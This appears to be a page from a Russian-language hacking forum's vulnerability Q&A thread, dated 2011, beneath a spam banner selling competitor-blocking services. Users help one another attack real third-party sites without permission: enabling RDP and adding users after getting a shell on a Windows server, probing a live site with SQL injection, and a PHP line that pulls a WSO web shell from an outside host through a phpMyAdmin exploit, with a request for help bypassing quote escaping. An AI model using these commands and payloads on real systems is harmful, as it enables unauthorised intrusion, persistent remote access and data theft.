УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1813 из 2438

1813

Опции темы

Поиск в этой теме

Опции просмотра

#18121

17.09.2011, 20:42

rad_scorp

Guest

Сообщений: n/a

Провел на форуме:
4017

Репутация: 1

Цитата:

Сообщение от Ulitko

Ulitko said:
Получил шелл на сайте. ОС системы, где стоит сайт - Windows. Как получить графический доступ? Пытался сувать батник, и запустить его, служба удаленного управления не запускается(
вот код запуска, мб я что-то напутал?

Тебе нужно убедиться, что стандартный rdp порт для тебя будет открыт на фаере шлюза. Во-вторых, нужно добавить юзера, с которым заходишь, в группу remoteusers или как-то так. Ну и в-третьих, проще залить что-нибудь туда, что само даст мордочку, имхо, если есть возможность, конечно.

#18122

17.09.2011, 20:48

rad_scorp

Guest

Сообщений: n/a

Провел на форуме:
4017

Репутация: 1

друзья, только начинаю знакомство с sql injection, нашел один сайт без проверки на простейшую инъекцию. Если %27, то:

Код:

Code:
DB Error: syntax error 
SELECT login, password FROM emps WHERE login = '' or 1=1 --' 
[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2]

а если 'admin' or "1"="1" /* то:

Код:

Code:
DB Error: unknown error
SELECT login, password FROM emps WHERE login = 'admin' or "1"="1" /*' 
[nativecode=144 ** Table './tradtyru/emps' is marked as crashed and last (automatic?) repair failed]

Скажите, я все правильно делаю и все правильно кто-то уже сделал до меня, зарегав пользователя "; DROP TABLE", или я чего-то не учитываю?

P.S. не называю сайт, хочу сам расковырять, если возможно.

#18123

17.09.2011, 21:28

Ulitko

Guest

Сообщений: n/a

Провел на форуме:
4389

Репутация: 0

Цитата:

Сообщение от rad_scorp

rad_scorp said:
Тебе нужно убедиться, что стандартный rdp порт для тебя будет открыт на фаере шлюза. Во-вторых, нужно добавить юзера, с которым заходишь, в группу remoteusers или как-то так. Ну и в-третьих, проще залить что-нибудь туда, что само даст мордочку, имхо, если есть возможность, конечно.

насчет юзера, это все ясно. Через батник он добавляется спокойно. А насчет мордочки, можешь ченить поконкретнее посоветовать?

#18124

17.09.2011, 22:10

rad_scorp

Guest

Сообщений: n/a

Провел на форуме:
4017

Репутация: 1

Цитата:

Сообщение от Ulitko

Ulitko said:
насчет юзера, это все ясно. Через батник он добавляется спокойно. А насчет мордочки, можешь ченить поконкретнее посоветовать?

Хм, что-то выдумать, кроме vnc, ничего не могу. Может, сообщество ау?

А начни проще, у тебя порт слушается? netstat?

#18125

17.09.2011, 22:18

Ulitko

Guest

Сообщений: n/a

Провел на форуме:
4389

Репутация: 0

введя нетстат, выдало дохрена подключений.

#18126

17.09.2011, 22:55

xa-xa89

Участник форума

Регистрация: 17.05.2008

Сообщений: 102

Провел на форуме:
1054394

Репутация: 74

Отправить сообщение для xa-xa89 с помощью ICQ

Цитата:

Сообщение от None

дохрена подключений.

дохрена подключений по rdp?

ты уверен что служба рдп запущенна что бы ее открывать в фаерволе?

просто даже если добавил пользователя и октрыл для нее порт в фаерволе а служба не запущенна хрен что у тебя получится!

net start TermService

как то так вроде.

@rad_scorp

судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.

а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.

у тебя какая версия?

#18127

17.09.2011, 23:00

rad_scorp

Guest

Сообщений: n/a

Провел на форуме:
4017

Репутация: 1

Цитата:

Сообщение от Ulitko

Ulitko said:
введя нетстат, выдало дохрена подключений.

Хм. Да, не так все просто, как все сложно, но ман нетстата почитать неплохо бы.

Держи:

Код:

Code:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -a -n | findstr "3389"

Это разрешает соединения к терминальному серверу и затем удостоверяется, что сервис up and running. Это та самая галочка во вкладке свойств моего компьютера. В xp фаер вроде не мешает, если мешает - можно выключить. На 2008 (а значит, и, скорее всего, в 7) мы сталкивались с тем, что сервак увезли, а включить rdp забыли, и так просто туда не долезть. Тогда надо в реестре у фаера пару правил поправить, но сейчас не вспомню, если надо, в понедельник в личку пиши.

Если слушающего порта не появилось, то я не нашел, как ТС включить без перезагрузки. У меня net start "Terminal Services" не работает.

#18128

17.09.2011, 23:04

rad_scorp

Guest

Сообщений: n/a

Провел на форуме:
4017

Репутация: 1

Цитата:

Сообщение от xa-xa89

xa-xa89 said:
@rad_scorp
судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.
а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.
у тебя какая версия?

Не знаю, пока предположений нет. Попробовать union чтобы хоть какие-то версии отсечь? И такую ли ошибку выдает?

#18129

17.09.2011, 23:18

Cherep

Новичок

Регистрация: 30.05.2010

Сообщений: 10

Провел на форуме:
42585

Репутация: 0

Цитата:

Сообщение от xa-xa89

xa-xa89 said:
дохрена подключений по rdp?
ты уверен что служба рдп запущенна что бы ее открывать в фаерволе?
просто даже если добавил пользователя и октрыл для нее порт в фаерволе а служба не запущенна хрен что у тебя получится!
net start TermService
как то так вроде.
@rad_scorp
судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.
а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.
у тебя какая версия?

просто помимо сайта, на компе стоит сервер одной MMORPG игры) Вот по этому и дохрена подключений)

#18130

18.09.2011, 01:23

Sloneny

Новичок

Регистрация: 08.03.2010

Сообщений: 0

Провел на форуме:
11373

Репутация: 0

Отправить сообщение для Sloneny с помощью ICQ

С помощью эксплойта через phpMyAdmin/scripts/setup.php

выводит phpinfo();

allow_url_fopen on

magic_quotes_gpc on

при попытке залить полноценный шелл с помощью такой конструкции

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wso.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://www.*********.com/wso/******.txt'[/COLOR][COLOR="#007700"]));[/COLOR][/COLOR]

одинарная кавычка экранируется обратным слешем \'

тестил на другом сайте с такими же вышеуказанными параметрами шелл все равно заливается 8-0

пытался кавычку, часть запроса или весь запрос хексить и чарить, не помогло

Подскажите пожалуйста где я ошибся, и каким еще образом можно попытаться обойти экранирование

и залить полноценный шелл.

Страница 1813 из 2438

1813

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход